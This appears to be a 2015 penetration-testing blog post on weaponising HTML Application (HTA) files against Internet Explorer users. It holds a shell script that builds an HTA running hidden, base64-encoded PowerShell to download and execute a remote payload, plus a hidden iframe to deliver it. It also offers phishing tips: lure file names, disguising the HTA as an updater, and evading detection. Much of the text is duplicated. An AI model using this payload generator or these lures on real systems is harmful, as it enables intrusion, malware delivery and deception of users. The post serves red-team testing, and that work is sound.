July 24, 2015
Malicious HTA's not just for Spammers
Written by
Justin Elze
Penetration Testing
Security Testing & Analysis
Malicious HTML Applications (HTAs) are nothing new to the security world. A quick Google search will show you posts dating back to 2006 or earlier. At that time, they were primarily used in email phishing attacks as attachments. Currently, most if not all email appliances will flag or drop HTA attachments.
If you need a quick primer on HTA files, Microsoft provides an “Introduction to HTML Applications (HTAs),” located here: https://msdn.microsoft.com/en-us/library/ms536496(VS.85).aspx
In recent years, HTA files have been used as part of drive-by web attacks or droppers for malware in the wild. Using HTA files for web-based attacks against Internet Explorer has proven reliable and successful because an HTA file, when opened in IE, gets launched by mshta.exe which is a signed Microsoft binary allowing you to call PowerShell and inject a payload directly into memory.
IE will prompt a user twice when attempting to load an HTA file. The first dialogue is OPEN/SAVE/SAVE AS. Naming the HTA file something relevant to your specific phishing campaign greatly increases the chances of a user opening the HTA file such as Survey.hta, Fax.hta, VPN_Deployment.hta, MicrosoftUpdate.hta, and CompanyName_IT_Policy_Update.hta.
The second dialogue is a security warning, however, the name includes Microsoft and the Publisher is Microsoft Windows, causing most users to feel safe allowing the HTA file to execute.
A couple tools have already been released by the security community to use in testing.
Michele Orru (@antisnatchor) included this attack in the Beef framework in 2014: https://www.pentestgeek.com/phishing/phishing-frenzy-hta-powershell-attacks-with-beef/
Nikhil "SamratAshok" Mittal (@nikhil_mitt) created Out-HTA.ps1 which creates malicious HTA scripts that can execute PowerShell: https://github.com/samratashok/nishang/blob/master/Client/Out-HTA.ps1
Both of these tools are great, however, I wanted something outside of BeeF and I normally generate and host these attacks from Linux which limits the usefulness of generating from PowerShell.
Originally, I was using a quick and dirty shell script leveraging the Web_Delivery module inside Metasploit. Depending on the situation, I would just skip the web_delivery step and use Unicorn (https://github.com/trustedsec/unicorn) to generate the PowerShell payload.
[code]# Set DownLoadString from exploit/multi/script/web_delivery
ps="iex (New-Object Net.WebClient).DownloadString('http//192.168.2.3/InHFgoM77v6ck')"
encode="`echo $ps | iconv --to-code UTF-16LE | base64 -w 0`"
echo -e "####HTA FILE####\n"
echo "<script>"
echo 'a=new ActiveXObject("WScript.Shell");'
echo "a.run('%windir%\\\\System32\\\\cmd.exe /c powershell.exe -nop -w hidden -enc $encode');"
echo 'a.run("http://www.companyname.com/legit.pdf")';
echo "window.close();"
echo "</script>"
echo -e "\n ####IFRAME####\n"
echo '<iframe id="frame" src="CHANGEME.hta" application="yes" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no>></iframe>'
[/code]
Recently, HTA file support was added into Unicorn. Here is a quick walkthrough.
Generating the payload via the command line:
Payload successfully generated:
Moving files and starting MSF listener:
Victim Machine browsing to web server and being prompted to open HTA:
Victim Machine - Prompt to Allow/Don't Allow
Successful exploitation of client machine:
Dave has also created a video of this process here:
[embed]https://vimeo.com/133520465[/embed]
A few additional tips: You don’t want to leave users questioning their actions and quickly reporting the phish. The examples above are really the most basic. There is a ton of flexibility inside an HTA file; you could easily make it appear to be an Adobe updater, secure document reader, and a number of other things. It would also be beneficial to host the HTA file over HTTPS limiting detection rates for companies not utilizing some sort of SSL interception/termination. Lastly, utilizing htaccess files or other methods to redirect based on browser types will help increase success rates. This includes doing something as simple as redirecting mobile clients and informing that the website doesn’t yet have mobile support.
This article was written by Justin Elze (@justinelze) of TrustedSec.
Update: Ben Campbell (@Meatballs__ ) for pointing out you can also generate HTA files using msfvenom" https://github.com/rapid7/metasploit-framework/pull/5212/files
The second dialogue is a security warning, however, the name includes Microsoft and the Publisher is Microsoft Windows, causing most users to feel safe allowing the HTA file to execute.
A couple tools have already been released by the security community to use in testing.
Michele Orru (@antisnatchor) included this attack in the Beef framework in 2014: https://www.pentestgeek.com/phishing/phishing-frenzy-hta-powershell-attacks-with-beef/
Nikhil "SamratAshok" Mittal (@nikhil_mitt) created Out-HTA.ps1 which creates malicious HTA scripts that can execute PowerShell: https://github.com/samratashok/nishang/blob/master/Client/Out-HTA.ps1
Both of these tools are great, however, I wanted something outside of BeeF and I normally generate and host these attacks from Linux which limits the usefulness of generating from PowerShell.
Originally, I was using a quick and dirty shell script leveraging the Web_Delivery module inside Metasploit. Depending on the situation, I would just skip the web_delivery step and use Unicorn (https://github.com/trustedsec/unicorn) to generate the PowerShell payload.
[code]# Set DownLoadString from exploit/multi/script/web_delivery
ps="iex (New-Object Net.WebClient).DownloadString('http//192.168.2.3/InHFgoM77v6ck')"
encode="`echo $ps | iconv --to-code UTF-16LE | base64 -w 0`"
echo -e "####HTA FILE####\n"
echo "<script>"
echo 'a=new ActiveXObject("WScript.Shell");'
echo "a.run('%windir%\\\\System32\\\\cmd.exe /c powershell.exe -nop -w hidden -enc $encode');"
echo 'a.run("http://www.companyname.com/legit.pdf")';
echo "window.close();"
echo "</script>"
echo -e "\n ####IFRAME####\n"
echo '<iframe id="frame" src="CHANGEME.hta" application="yes" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no>></iframe>'
[/code]
Recently, HTA file support was added into Unicorn. Here is a quick walkthrough.
Generating the payload via the command line:
Payload successfully generated:
Moving files and starting MSF listener:
Victim Machine browsing to web server and being prompted to open HTA:
Victim Machine - Prompt to Allow/Don't Allow
Successful exploitation of client machine:
Dave has also created a video of this process here:
[embed]https://vimeo.com/133520465[/embed]
A few additional tips: You don’t want to leave users questioning their actions and quickly reporting the phish. The examples above are really the most basic. There is a ton of flexibility inside an HTA file; you could easily make it appear to be an Adobe updater, secure document reader, and a number of other things. It would also be beneficial to host the HTA file over HTTPS limiting detection rates for companies not utilizing some sort of SSL interception/termination. Lastly, utilizing htaccess files or other methods to redirect based on browser types will help increase success rates. This includes doing something as simple as redirecting mobile clients and informing that the website doesn’t yet have mobile support.
This article was written by Justin Elze (@justinelze) of TrustedSec.
Update: Ben Campbell (@Meatballs__ ) for pointing out you can also generate HTA files using msfvenom" https://github.com/rapid7/metasploit-framework/pull/5212/files